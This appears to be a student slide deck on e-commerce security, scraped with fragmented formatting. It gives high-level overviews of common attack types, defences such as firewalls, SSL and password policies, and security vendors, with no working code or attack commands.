E-Commerce Security

wispxylopolistInternet and Web Development

Aug 7, 2012 (4 years and 10 months ago)

337 views

E
RIC

P
OZZOBON
, J
USTIN

P
ESZLENY
,
S
UMEET

G
ILL

W
HAT

IS

E
C
OMMERCE


Exchanging goods and
services over the internet


All major retail brands
have an online presence


Banks, Industry, Retail…


Some brands do not even
have a physical presence


Can be business to
business or customer
related

Common Web Sphere
Commerce Business Model

T
IMELINE


1979: Michael Aldrich Invented Online Shopping



1984: CompuServe launches the “Electronic Mall.” First
advanced
eCommerce

service.



1994: The first online bank opens.


1995: Amazon.com launches.



2000: .com bust



2011 US
e
Commerce

and online retail sales projected to
reach 197 billion

S
ECURITY


Three main concepts


Confidentiality


only authorized parties can read
protected information


Integrity


data remains intact from sender to receiver


Availability


you have access to the resources which are
rightfully yours


Two Perspectives


Development


security features of a system
(encryption, password policies)


Consumer


Protection against attacks (firewalls,
passwords)

S
ECURITY

F
EATURES


Basic categories of security features:


Authentication


Verifies who you are (ex. Guest cannot
log in as admin)


Authorization


What you are allowed to do with your
information
(ex.
Cannot increase your bank balance
from computer)


Encryption


Information disguised as something else or
indecipherable


Auditing


Keeping track of transactions that occur

I
NVOLVED

P
ARTIES


Shopper


Purchaser of
online goods or services


Web Site


Seller of online
goods or services


Software vendor


Creates
and maintains

website and
other business solutions


Hacker


attempts
illegitimate gains through
exploiting the system

W
HY

E
C
RIME


Many benefits over traditional crime:


Cheaper to implement


Resources more readily available


Generally higher payoff (imagine stealing 10 cents from
every bank account in one major bank)


Broader range of targets


Less potential for witnessing


Potential to exploit international laws


Less potential to leave a trail

A
TTACK

P
OINTS


Shopper


Shopper’s Computer


Network Connection


Server


Rogue Software

T
YPES

OF

A
TTACKS


Tricking the shopper:


Generally the easiest form of attack


Hacker gathers information from websites and the customers
themselves


Common password recovery questions (compromises site and
accounts on other sites)


Phishing schemes involve mistypes to gather secure
information (
eg
. Ibm.com/shop vs. Ibn.com/shop)


Scanning Computers


New computer/internet users have vague security knowledge


Attacker can exploit computers to scan for sensitive
information


Port Scans to detect vulnerabilities


User disabling firewall for conflicts, results in inadequate
firewall protection


T
YPES

OF

A
TTACKS

CONT
.


Sniffing the network


Scans incoming and
outgoing transactions
for information


Points in the network
where this is more
practical


Sniffing the network

T
YPES

OF

A
TTACKS

CONT
.


Denial of Service


Floods the server with
useless requests


Renders server
incapable of preforming
any other task


Potential for attackers to
create “slaves” to send
requests to lock up
target server

Denial of Service

T
YPES

OF

A
TTACKS

CONT
.


SQL Injections


Hacker inputs a single quote to return an SQL error and see
what software is being used, then hacks into it based on that
information


Price manipulation


Some retailers have price in URL. Hackers will change the
number in order to get a lower price.


Buffer overflow


Overflows the system with bytes in order to see what function
is being used in PHP, from that information, hacker is able to
access the restricted “admin” folder.


T
YPES

OF

A
TTACKS

CONT
.


Cross
site scripting


Hacker
will use a script to try and steal the user’s cookies
which would have session information in them.


Pop
up to redirect user to hacker’s website. Hacker website is
skinned to look like other common websites (E.g. Bank
websites)


Remote
command execution


Uses
CGI scripts to execute operating system commands.


Weak
authentication/authorization


Can
intercept log
-
in details or other highly sensitive data if
the page does not use HTTPS or other types of encryption


D
EFENSES


Education


Firewalls


Secure Socket Layer (SSL)


Password Policies


Threat Models


Security Audits

T
YPES

OF

D
EFENSE


Education


Make the consumer aware of security risks and how to avoid
them


Personal Firewall


Limits the types and amount of traffic allowed on your
computers


Security Audits


Non
-
electrontic

review of transactions in the sever to check
for breaches


T
YPES

OF

D
EFENCE

CONT
.


Server Firewalls


Only pass secure
information through for
processing


“Honeypots” used to
trap attacks and exploits
and store their
information for law
enforcement

Server Firewalls

T
YPES

OF

D
EFENCE

CONT
.


Threat Models


Allow people to see
potential weak links in
security


Allow for software and
network revision

Threat Models

T
YPES

OF

D
EFENCE

CONT
.

Policy

Value

Account lockout threshold

6 attempts

Consecutive unsuccessful login delay

10 seconds

Matching user ID and password

N (no, they cannot match)

Maximum occurrence of consecutive
characters

3 characters

Maximum instances of any character

4 instances

Maximum lifetime of passwords

180 days

Minimum number of alphabetic
characters

1 alphabetic character

Minimum number of numeric
characters

1 numeric character

Minimum length of password

6 characters

Reuse user's previous password

N (no, cannot be reused)

Password Policies

S
ECURITY

C
OMPANIES


ESET


NOD32
is a unified anti
-
threat system which protects against viruses,
spyware, adware,
trojans
, worms, and phishing
attacks


F
-
Secure


Protects
consumers and businesses against computer viruses and other
threats and also stretched across mobile networks


Global
market leader in mobile phone
protection


Fortify Software


Have created software that enables organizations to find, track, and fix
security vulnerabilities in their software applications


Works with existing development and audit tools and processes which
can reduce
the
time it takes to identify and remediate security flaws


Juniper Networks


SSL VPN (Secure Sockets Layer virtual private network) is single
platform security for small and large businesses


Designed to support organizations with the need to provide access for
remote/mobile employees, partners and customers


R
ESOURCES


http://www.ibm.com/developerworks/websphere/library/techarticles/0
504_mckegney/0504_mckegney.html


http://en.wikipedia.org/wiki/Electronic_commerce


http://www.symantec.com/connect/articles/common
-
security
-
vulnerabilities
-
e
-
commerce
-
systems


http://www.applicure.com/solutions/ecommerce
-
security


http://www.ecommercetimes.com/story/52323.html